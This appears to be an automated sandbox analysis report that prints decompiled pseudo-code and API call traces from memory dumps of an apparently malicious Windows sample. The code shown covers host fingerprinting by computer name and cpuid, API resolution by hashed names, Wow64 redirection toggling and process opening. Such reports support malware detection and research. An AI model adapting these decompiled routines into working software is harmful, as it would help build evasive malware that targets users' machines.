                                							if( *0x419a0e4() != 0) {
                                								_t63 = _t62;
                                								 *_t69 =  *_t69 ^ E0419283A(_v8 + _v8, _t63);
                                							}
                                							HeapFree( *0x419a290, 0, _t62);
                                						}
                                					}
                                				}
                                				_t61 = __imp__;
                                				_v8 = _v8 & 0x00000000;
                                				GetComputerNameW(0,  &_v8);
                                				_t34 = _v8;
                                				if(_t34 != 0) {
                                					_t68 = RtlAllocateHeap( *0x419a290, 0, _t34 + _t34);
                                					if(_t68 != 0) {
                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                							_t63 = _t68;
                                							_t69[3] = _t69[3] ^ E0419283A(_v8 + _v8, _t63);
                                						}
                                						HeapFree( *0x419a290, 0, _t68);
                                					}
                                				}
                                				asm("cpuid");
                                				_t67 =  &_v28;
                                				 *_t67 = 1;
                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                				 *(_t67 + 8) = _t63;
                                				 *(_t67 + 0xc) = _t64;
                                				_t39 = _v16 ^ _v20 ^ _v28;
                                				_t69[1] = _t69[1] ^ _t39;
                                				return _t39;
                                			}

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,041955CE), ref: 041944A2
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,041955CE,?,?,?,?,?,04196BD8,?,00000001), ref: 041944D0
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 041944F7
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0419450B
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04194518
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04194536
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heap$AllocateComputerFreeName
                                • String ID:
                                • API String ID: 3439771632-0
                                • Opcode ID: 095b4fe652be3ba2841b8b75bb43c5f9158781ba247388b7459133befe49d5d1
                                • Instruction ID: a039880456caa65e969565b4d3e085d95ec42ce171aea42d4a44281969b3c935
                                • Opcode Fuzzy Hash: 095b4fe652be3ba2841b8b75bb43c5f9158781ba247388b7459133befe49d5d1
                                • Instruction Fuzzy Hash: 8E313A72A14209EFEB21DFAAD9C0A6EB7F9FF48344F144469E505D3210DB35EE459B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04194F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                				intOrPtr _v8;
                                				intOrPtr _t23;
                                				intOrPtr _t26;
                                				_Unknown_base(*)()* _t28;
                                				intOrPtr _t30;
                                				_Unknown_base(*)()* _t32;
                                				intOrPtr _t33;
                                				_Unknown_base(*)()* _t35;
                                				intOrPtr _t36;
                                				_Unknown_base(*)()* _t38;
                                				intOrPtr _t39;
                                				_Unknown_base(*)()* _t41;
                                				intOrPtr _t44;
                                				struct HINSTANCE__* _t48;
                                				intOrPtr _t54;
                                
                                				_t54 = E04196837(0x20);
                                				if(_t54 == 0) {
                                					_v8 = 8;
                                				} else {
                                					_t23 =  *0x419a2d4; // 0x0
                                					_t1 = _t23 + 0x419b11a; // 0xe66068db
                                					_t48 = GetModuleHandleA(_t1);
                                					_t26 =  *0x419a2d4; // 0x0
                                					_t2 = _t26 + 0x419b792; // 0xa8e5fd73
                                					_v8 = 0x7f;
                                					_t28 = GetProcAddress(_t48, _t2);
                                					 *(_t54 + 0xc) = _t28;
                                					if(_t28 == 0) {
                                						L8:
                                						E041950CA(_t54);
                                					} else {
                                						_t30 =  *0x419a2d4; // 0x0
                                						_t5 = _t30 + 0x419b77f; // 0x94ba1371
                                						_t32 = GetProcAddress(_t48, _t5);
                                						 *(_t54 + 0x10) = _t32;
                                						if(_t32 == 0) {
                                							goto L8;
                                						} else {
                                							_t33 =  *0x419a2d4; // 0x0
                                							_t7 = _t33 + 0x419b74e; // 0xa3348e43
                                							_t35 = GetProcAddress(_t48, _t7);
                                							 *(_t54 + 0x14) = _t35;
                                							if(_t35 == 0) {
                                								goto L8;
                                							} else {
                                								_t36 =  *0x419a2d4; // 0x0
                                								_t9 = _t36 + 0x419b72e; // 0x45dac78a
                                								_t38 = GetProcAddress(_t48, _t9);
                                								 *(_t54 + 0x18) = _t38;
                                								if(_t38 == 0) {
                                									goto L8;
                                								} else {
                                									_t39 =  *0x419a2d4; // 0x0
                                									_t11 = _t39 + 0x419b7a2; // 0x23a90951
                                									_t41 = GetProcAddress(_t48, _t11);
                                									 *(_t54 + 0x1c) = _t41;
                                									if(_t41 == 0) {
                                										goto L8;
                                									} else {
                                										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                										_t44 = E04194248(_t54, _a8);
                                										_v8 = _t44;
                                										if(_t44 != 0) {
                                											goto L8;
                                										} else {
                                											 *_a12 = _t54;
                                										}
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v8;
                                			}

                                APIs
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • GetModuleHandleA.KERNEL32(E66068DB,00000020,74183966,00000000,00000000,?,?,?,041951C4,?,?,?,?,00000000,00000000), ref: 04194F7F
                                • GetProcAddress.KERNEL32(00000000,A8E5FD73), ref: 04194FA1
                                • GetProcAddress.KERNEL32(00000000,94BA1371), ref: 04194FB7
                                • GetProcAddress.KERNEL32(00000000,A3348E43), ref: 04194FCD
                                • GetProcAddress.KERNEL32(00000000,45DAC78A), ref: 04194FE3
                                • GetProcAddress.KERNEL32(00000000,23A90951), ref: 04194FF9
                                  • Part of subcall function 04194248: memset.NTDLL ref: 041942C7
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$AllocateHandleHeapModulememset
                                • String ID:
                                • API String ID: 1886625739-0
                                • Opcode ID: 0388055c99c088aebb3cd633c375a7efae8e44dc0dc7f74b90fdbed9b52c5cc4
                                • Instruction ID: ae6cd57c11df0cf9c79f381f01000c5862c8700088f3a95bfb2cf1ef957354b6
                                • Opcode Fuzzy Hash: 0388055c99c088aebb3cd633c375a7efae8e44dc0dc7f74b90fdbed9b52c5cc4
                                • Instruction Fuzzy Hash: 20217AB260024ABFDB24DF69E884E5A77ECEF08684B094165E808D7201E739FD05DFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 32%
                                			E04196BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                				intOrPtr _v36;
                                				intOrPtr _v44;
                                				intOrPtr _v48;
                                				intOrPtr _v52;
                                				void _v60;
                                				char _v64;
                                				long _t18;
                                				intOrPtr _t22;
                                				intOrPtr _t23;
                                				long _t29;
                                				intOrPtr _t30;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                
                                				_t30 = __edi;
                                				_t29 = _a4;
                                				_t31 = __eax;
                                				_t18 = E04192902(_t29, __edi, __eax);
                                				_a4 = _t18;
                                				if(_t18 != 0) {
                                					memset( &_v60, 0, 0x38);
                                					_t22 =  *0x419a2d4; // 0x0
                                					_v64 = 0x3c;
                                					if(_a8 == 0) {
                                						_t7 = _t22 + 0x419b4c8; // 0x53327e6e
                                						_t23 = _t7;
                                					} else {
                                						_t6 = _t22 + 0x419b8f8; // 0x212e7742
                                						_t23 = _t6;
                                					}
                                					_v36 = _t31;
                                					_t32 = __imp__;
                                					_v52 = _t23;
                                					_v48 = _t29;
                                					_v44 = _t30;
                                					 *_t32(0);
                                					_push( &_v64);
                                					if( *0x419a100() != 0) {
                                						_a4 = _a4 & 0x00000000;
                                					} else {
                                						_a4 = GetLastError();
                                					}
                                					 *_t32(1);
                                				}
                                				return _a4;
                                			}

                                APIs
                                  • Part of subcall function 04192902: SysAllocString.OLEAUT32(?), ref: 0419295E
                                  • Part of subcall function 04192902: SysAllocString.OLEAUT32(53327E6E), ref: 04192972
                                  • Part of subcall function 04192902: SysAllocString.OLEAUT32(00000000), ref: 04192984
                                  • Part of subcall function 04192902: SysFreeString.OLEAUT32(00000000), ref: 041929E8
                                • memset.NTDLL ref: 04196C05
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 04196C41
                                • GetLastError.KERNEL32 ref: 04196C51
                                • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04196C62
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                • String ID: <
                                • API String ID: 593937197-4251816714
                                • Opcode ID: 927b4335cd23efec4eb578a2c4bed4dd36515f684a0d89a2fb7f0169e08eda71
                                • Instruction ID: 842b60369ca60cd37b4f4ba6d0571fe979516c0db451616468ecf56cf8dbf254
                                • Opcode Fuzzy Hash: 927b4335cd23efec4eb578a2c4bed4dd36515f684a0d89a2fb7f0169e08eda71
                                • Instruction Fuzzy Hash: 6F11FAB1A00218ABDF00DFA6D885BD97BF8EB08394F04841AF919E7240D774ED44CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memcpy.NTDLL(04194A23,041970D9,00000010,?,?,?,04194A23,00000001,041970D9,00000000,?,041962B1,00000000,041970D9,?,00000000), ref: 04193A16
                                • memcpy.NTDLL(00000000,00000000,00000000,00000010), ref: 04193AA9
                                • GetLastError.KERNEL32(?,?,00000010), ref: 04193B01
                                • GetLastError.KERNEL32 ref: 04193B33
                                • GetLastError.KERNEL32 ref: 04193B47
                                • GetLastError.KERNEL32(?,?,?,04194A23,00000001,041970D9,00000000,?,041962B1,00000000,041970D9,?,00000000,041970D9,00000000,00000000), ref: 04193B5C
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ErrorLast$memcpy
                                • String ID:
                                • API String ID: 2760375183-0
                                • Opcode ID: 14086f76e32c02640120480da1a342903c49addaf14f3ecf490ac0ede4fcf8fd
                                • Instruction ID: 92ed93b42d4dc210c7713e65b40564f4d5b035061984359374f4ec9502f1f3e0
                                • Opcode Fuzzy Hash: 14086f76e32c02640120480da1a342903c49addaf14f3ecf490ac0ede4fcf8fd
                                • Instruction Fuzzy Hash: 1D514DB190024CFFDF109FA5DC84AAEBBF9EB08340F048465F925E6240D735AE54DB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 22%
                                			E04192A23(signed int __eax, signed int _a4, signed int _a8) {
                                				signed int _v8;
                                				signed int _v12;
                                				intOrPtr _v16;
                                				signed int _v20;
                                				intOrPtr _t81;
                                				char _t83;
                                				signed int _t90;
                                				signed int _t97;
                                				signed int _t99;
                                				char _t101;
                                				unsigned int _t102;
                                				intOrPtr _t103;
                                				char* _t107;
                                				signed int _t110;
                                				signed int _t113;
                                				signed int _t118;
                                				signed int _t122;
                                				intOrPtr _t124;
                                
                                				_t102 = _a8;
                                				_t118 = 0;
                                				_v20 = __eax;
                                				_t122 = (_t102 >> 2) + 1;
                                				_v8 = 0;
                                				_a8 = 0;
                                				_t81 = E04196837(_t122 << 2);
                                				_v16 = _t81;
                                				if(_t81 == 0) {
                                					_push(8);
                                					_pop(0);
                                					L37:
                                					return 0;
                                				}
                                				_t107 = _a4;
                                				_a4 = _t102;
                                				_t113 = 0;
                                				while(1) {
                                					_t83 =  *_t107;
                                					if(_t83 == 0) {
                                						break;
                                					}
                                					if(_t83 == 0xd || _t83 == 0xa) {
                                						if(_t118 != 0) {
                                							if(_t118 > _v8) {
                                								_v8 = _t118;
                                							}
                                							_a8 = _a8 + 1;
                                							_t118 = 0;
                                						}
                                						 *_t107 = 0;
                                						goto L16;
                                					} else {
                                						if(_t118 != 0) {
                                							L10:
                                							_t118 = _t118 + 1;
                                							L16:
                                							_t107 = _t107 + 1;
                                							_t15 =  &_a4;
                                							 *_t15 = _a4 - 1;
                                							if( *_t15 != 0) {
                                								continue;
                                							}
                                							break;
                                						}
                                						if(_t113 == _t122) {
                                							L21:
                                							if(_a8 <= 0x20) {
                                								_push(0xb);
                                								L34:
                                								_pop(0);
                                								L35:
                                								E041950CA(_v16);
                                								goto L37;
                                							}
                                							_t103 = E04196837((_v8 + _v8 + 5) * _a8 + 4);
                                							if(_t103 == 0) {
                                								_push(8);
                                								goto L34;
                                							}
                                							_t90 = _a8;
                                							_a4 = _a4 & 0x00000000;
                                							_v8 = _v8 & 0x00000000;
                                							_t124 = _t103 + _t90 * 4;
                                							if(_t90 <= 0) {
                                								L31:
                                								 *0x419a2cc = _t103;
                                								goto L35;
                                							}
                                							do {
                                								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                								_v12 = _v12 & 0x00000000;
                                								if(_a4 <= 0) {
                                									goto L30;
                                								} else {
                                									goto L26;
                                								}
                                								while(1) {
                                									L26:
                                									_t99 = _v12;
                                									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
                                									if(_t99 == 0) {
                                										break;
                                									}
                                									_v12 = _v12 + 1;
                                									if(_v12 < _a4) {
                                										continue;
                                									}
                                									goto L30;
                                								}
                                								_v8 = _v8 - 1;
                                								L30:
                                								_t97 = _a4;
                                								_a4 = _a4 + 1;
                                								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                								__imp__(_t124);
                                								_v8 = _v8 + 1;
                                								_t124 = _t124 + _t97 + 1;
                                							} while (_v8 < _a8);
                                							goto L31;
                                						}
                                						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                						_t101 = _t83;
                                						if(_t83 - 0x61 <= 0x19) {
                                							_t101 = _t101 - 0x20;
                                						}
                                						 *_t107 = _t101;
                                						_t113 = _t113 + 1;
                                						goto L10;
                                					}
                                				}
                                				if(_t118 != 0) {
                                					if(_t118 > _v8) {
                                						_v8 = _t118;
                                					}
                                					_a8 = _a8 + 1;
                                				}
                                				goto L21;
                                			}






















                                APIs
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • lstrcpy.KERNEL32(00000001,00000020), ref: 04192B20
                                • lstrcat.KERNEL32(00000001,00000020), ref: 04192B35
                                • lstrcmp.KERNEL32(00000000,00000001), ref: 04192B4C
                                • lstrlen.KERNEL32(00000001), ref: 04192B70
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 87a16de494389fc1c4fd805f0063a4410b69f27e6cc24a99fade8de299456e28
                                • Instruction ID: 2355a2c0de766b776b72f3910bd85f7e0437680c7feab327ac96038a18bf9ea2
                                • Opcode Fuzzy Hash: 87a16de494389fc1c4fd805f0063a4410b69f27e6cc24a99fade8de299456e28
                                • Instruction Fuzzy Hash: A8517B76A00208FBDF25CF99C584AADBBF6EF45314F15889AE8199B201C770AE41CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 55%
                                			E0419624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                				intOrPtr _v8;
                                				intOrPtr _t9;
                                				intOrPtr _t13;
                                				char* _t28;
                                				void* _t33;
                                				void* _t34;
                                				void* _t36;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				char* _t40;
                                				void* _t42;
                                				void* _t43;
                                
                                				_t34 = __edx;
                                				_push(__ecx);
                                				_t9 =  *0x419a2d4; // 0x0
                                				_t1 = _t9 + 0x419b60c; // 0x63dcc828
                                				_t36 = 0;
                                				_t28 = E0419278C(__ecx, _t1);
                                				if(_t28 != 0) {
                                					_t39 = __imp__;
                                					_t13 =  *_t39(_t28, _t38);
                                					_v8 = _t13;
                                					_t6 =  *_t39(_a4) + 1; // 0x1
                                					_t40 = E04196837(_v8 + _t6);
                                					if(_t40 != 0) {
                                						strcpy(_t40, _t28);
                                						_pop(_t33);
                                						__imp__(_t40, _a4);
                                						_t36 = E041949FE(_t33, _t34, _t40, _a8);
                                						E041950CA(_t40);
                                						_t42 = E04197565( *0x419a10c(_t36, "="), _t36);
                                						if(_t42 != 0) {
                                							E041950CA(_t36);
                                							_t36 = _t42;
                                						}
                                						_t43 = E041952E5(_t36, _t33);
                                						if(_t43 != 0) {
                                							E041950CA(_t36);
                                							_t36 = _t43;
                                						}
                                					}
                                					E041950CA(_t28);
                                				}
                                				return _t36;
                                			}
















                                APIs
                                  • Part of subcall function 0419278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04196266,63DCC828,00000000,00000000,?,00000000,041970D9), ref: 041927F3
                                  • Part of subcall function 0419278C: sprintf.NTDLL ref: 04192814
                                • lstrlen.KERNEL32(00000000,00000000,63DCC828,00000000,00000000,?,00000000,041970D9,00000000,00000000), ref: 04196278
                                • lstrlen.KERNEL32(00000000,?,00000000,041970D9,00000000,00000000), ref: 04196280
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • strcpy.NTDLL ref: 04196297
                                • lstrcat.KERNEL32(00000000,00000000), ref: 041962A2
                                  • Part of subcall function 041949FE: lstrlen.KERNEL32(00000000,00000000,041970D9,00000000,?,041962B1,00000000,041970D9,?,00000000,041970D9,00000000,00000000), ref: 04194A0F
                                  • Part of subcall function 041950CA: HeapFree.KERNEL32(00000000,00000000,04194239,00000000,00000001,?,00000000,?,?,?,04196B8D,00000000,?,00000001), ref: 041950D6
                                  • Part of subcall function 04197565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,041962CB,00000000,?,00000000,041970D9,00000000,00000000), ref: 0419756F
                                  • Part of subcall function 04197565: _snprintf.NTDLL ref: 041975CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrlen$Heap$AllocateFree_snprintflstrcatsprintfstrcpy
                                • String ID: =
                                • API String ID: 3759146525-1428090586
                                • Opcode ID: b94767f5495708f21770d4339dbc024b315211b6278897b9f9ed2abab0769252
                                • Instruction ID: 4d67d1eeae3caa63fa8f25c68b3318482e0b04f9a215e0fe92cc1e2540b438bf
                                • Opcode Fuzzy Hash: b94767f5495708f21770d4339dbc024b315211b6278897b9f9ed2abab0769252
                                • Instruction Fuzzy Hash: 24117073901225779F166BA99CC4C6E37EEAF496583094069F904A7200DF79FD0297E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E04194C1B(intOrPtr _a4) {
                                				void* _t2;
                                				long _t4;
                                				void* _t5;
                                				long _t6;
                                				void* _t7;
                                
                                				_t2 = CreateEventA(0, 1, 0, 0);
                                				 *0x419a2c4 = _t2;
                                				if(_t2 == 0) {
                                					return GetLastError();
                                				}
                                				_t4 = GetVersion();
                                				if(_t4 <= 5) {
                                					_t5 = 0x32;
                                					return _t5;
                                				}
                                				 *0x419a2b4 = _t4;
                                				_t6 = GetCurrentProcessId();
                                				 *0x419a2b0 = _t6;
                                				 *0x419a2bc = _a4;
                                				_t7 = OpenProcess(0x10047a, 0, _t6);
                                				 *0x419a2ac = _t7;
                                				if(_t7 == 0) {
                                					 *0x419a2ac =  *0x419a2ac | 0xffffffff;
                                				}
                                				return 0;
                                			}









                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04196B4E,?,?,00000001), ref: 04194C23
                                • GetVersion.KERNEL32(?,00000001), ref: 04194C32
                                • GetCurrentProcessId.KERNEL32(?,00000001), ref: 04194C41
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 04194C5E
                                • GetLastError.KERNEL32(?,00000001), ref: 04194C7D
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 3f2bd17d5bed21b5b53f36641d1a4e4f9244e5c8f801b385384300ddea7a0afe
                                • Instruction ID: 508744075783cc5bf8984b676678f8ef951faf219b5aacb81c7f79f6c75b8864
                                • Opcode Fuzzy Hash: 3f2bd17d5bed21b5b53f36641d1a4e4f9244e5c8f801b385384300ddea7a0afe
                                • Instruction Fuzzy Hash: 45F090B0758341AFEB288F67A84AB153BB8EB04780F04421DE116C52C0DF7A5C85CF15
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 51%
                                			E041953F2(signed int __edx) {
                                				signed int _v8;
                                				long _v12;
                                				signed int _v16;
                                				long _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				char _v40;
                                				void* __edi;
                                				void* __esi;
                                				void* _t27;
                                				long _t28;
                                				long _t31;
                                				intOrPtr _t32;
                                				signed int _t37;
                                				intOrPtr _t38;
                                				void* _t39;
                                				long _t42;
                                				long _t48;
                                				void* _t54;
                                				void* _t56;
                                				intOrPtr _t64;
                                				intOrPtr _t67;
                                				intOrPtr* _t70;
                                				long _t71;
                                				void* _t72;
                                				signed char _t74;
                                				intOrPtr _t76;
                                				signed int _t77;
                                				long _t82;
                                				long _t84;
                                				long _t87;
                                				void* _t88;
                                
                                				_t79 = __edx;
                                				_v16 = 0;
                                				_v8 = 0;
                                				_v12 = 0;
                                				_t27 = E041958F8();
                                				if(_t27 != 0) {
                                					_t77 =  *0x419a2b4; // 0x42ee000a
                                					_t73 = (_t77 & 0xf0000000) + _t27;
                                					 *0x419a2b4 = (_t77 & 0xf0000000) + _t27;
                                				}
                                				_t28 =  *0x419a148(0, 2);
                                				_v20 = _t28;
                                				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                					_t31 = E0419696F( &_v8,  &_v16);
                                					_push(0);
                                					_t84 = _t31;
                                					_t32 =  *0x419a2d4; // 0x0
                                					_push(0x419a2fc);
                                					_push(1);
                                					_t7 = _t32 + 0x419b5ad; // 0x8b330082
                                					 *0x419a2f8 = 0xc;
                                					 *0x419a300 = 0;
                                					L04194AF8();
                                					if(E04196384(_t79,  &_v24,  &_v12) == 0) {
                                						CloseHandle(_v24);
                                					}
                                					if(_t84 != 5) {
                                						_t37 = _v16;
                                						__eflags = _t37;
                                						_t70 =  *0x419a134; // 0x4197909
                                						if(_t37 != 0) {
                                							E04194454(_t37 ^ 0xe8fa7dd7,  &_v40);
                                							_t87 = E04196837(0x27);
                                							__eflags = _t87;
                                							if(_t87 != 0) {
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								_t64 =  *0x419a2d4; // 0x0
                                								_t18 = _t64 + 0x419b84f; // 0x771c5467
                                								 *_t70(_t87, _t18, _v40, _v36, _v32, _v28);
                                								_t88 = _t88 + 0x18;
                                							}
                                							 *0x419a32c = _t87;
                                						}
                                						_t38 = E041960E1();
                                						 *0x419a2c8 =  *0x419a2c8 ^ 0xe8fa7dd7;
                                						 *0x419a31c = _t38;
                                						_t39 = E04196837(0x60);
                                						__eflags = _t39;
                                						 *0x419a37c = _t39;
                                						if(_t39 == 0) {
                                							_t84 = 8;
                                						} else {
                                							memset(_t39, 0, 0x60);
                                							_t54 =  *0x419a37c; // 0x0
                                							_t88 = _t88 + 0xc;
                                							__imp__(_t54 + 0x40);
                                							_t56 =  *0x419a37c; // 0x0
                                							 *_t56 = 0x419b83e;
                                							_t84 = 0;
                                						}
                                						__eflags = _t84;
                                						if(_t84 == 0) {
                                							_t42 = RtlAllocateHeap( *0x419a290, _t84, 0x43);
                                							__eflags = _t42;
                                							 *0x419a314 = _t42;
                                							if(_t42 == 0) {
                                								_t84 = 8;
                                							} else {
                                								_t74 =  *0x419a2b4; // 0x42ee000a
                                								_t79 = _t74 & 0x000000ff;
                                								_t76 =  *0x419a2d4; // 0x0
                                								_t19 = _t76 + 0x419b53a; // 0x66e03591
                                								_t73 = _t19;
                                								 *_t70(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x41992a7);
                                							}
                                							__eflags = _t84;
                                							if(_t84 == 0) {
                                								asm("sbb eax, eax");
                                								E04194454( ~_v8 &  *0x419a2c8, 0x419a00c);
                                								_t84 = E04192206(_t73);
                                								__eflags = _t84;
                                								if(_t84 != 0) {
                                									goto L31;
                                								}
                                								_t48 = E04191376();
                                								__eflags = _t48;
                                								if(_t48 != 0) {
                                									__eflags = _v8;
                                									_t82 = _v12;
                                									if(_v8 != 0) {
                                										L30:
                                										_t84 = E04192022(_t79, _t82, _v8);
                                										goto L31;
                                									}
                                									__eflags = _t82;
                                									if(__eflags == 0) {
                                										goto L31;
                                									}
                                									_t23 = _t82 + 4; // 0x5
                                									_t84 = E04192439(__eflags, _t23);
                                									__eflags = _t84;
                                									if(_t84 == 0) {
                                										goto L31;
                                									}
                                									goto L30;
                                								}
                                								_t84 = 8;
                                							}
                                						}
                                					} else {
                                						_t71 = _v12;
                                						if(_t71 == 0) {
                                							L31:
                                							if(_v20 == 0 || _v20 == 1) {
                                								 *0x419a14c();
                                							}
                                							goto L35;
                                						}
                                						_t72 = _t71 + 4;
                                						do {
                                							_push(1);
                                							_push(_t72);
                                							_t67 = 5;
                                						} while (E04196BE1(_t67, 0) == 0x4c7);
                                					}
                                					goto L31;
                                				} else {
                                					_t84 = _t28;
                                					L35:
                                					return _t84;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 041958F8: GetModuleHandleA.KERNEL32(E66068DB,00000000,0419540B,00000000,00000000,00000000,?,?,?,?,?,04196BD8,?,00000001), ref: 04195907
                                • CloseHandle.KERNEL32(?,?,00000001,8B330082,00000001,0419A2FC,00000000,?,?,?,?,?,?,?,04196BD8), ref: 0419548F
                                • memset.NTDLL ref: 0419553F
                                • RtlInitializeCriticalSection.NTDLL(-00000040), ref: 04195550
                                • RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 04195579
                                  • Part of subcall function 04194454: RtlAllocateHeap.NTDLL(00000000,041955CE), ref: 041944A2
                                  • Part of subcall function 04194454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,041955CE,?,?,?,?,?,04196BD8,?,00000001), ref: 041944D0
                                  • Part of subcall function 04194454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 041944F7
                                  • Part of subcall function 04194454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0419450B
                                  • Part of subcall function 04194454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 04194518
                                  • Part of subcall function 04194454: HeapFree.KERNEL32(00000000,00000000), ref: 04194536
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
